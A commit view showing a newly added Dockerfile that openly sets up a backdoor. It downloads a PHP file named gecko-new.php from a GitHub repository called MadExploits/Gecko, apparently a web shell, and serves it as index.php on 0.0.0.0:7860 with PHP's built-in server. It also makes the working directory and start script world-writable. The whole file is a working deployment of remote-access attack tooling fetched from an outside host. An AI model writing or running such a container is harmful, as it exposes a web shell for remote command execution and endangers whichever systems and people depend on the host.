Create Dockerfile
Browse files- Dockerfile +9 -0
Dockerfile
ADDED
@@ -0,0 +1,9 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
FROM php:latest
|
2 |
+
WORKDIR /backdoor
|
3 |
+
RUN apt update
|
4 |
+
RUN apt install wget -y
|
5 |
+
RUN wget https://github.com/MadExploits/Gecko/raw/refs/heads/main/gecko-new.php -O index.php
|
6 |
+
RUN echo php -S 0.0.0.0:7860 > file.sh
|
7 |
+
RUN chmod +777 $(pwd)
|
8 |
+
RUN chmod +777 file.sh
|
9 |
+
CMD "./file.sh"
|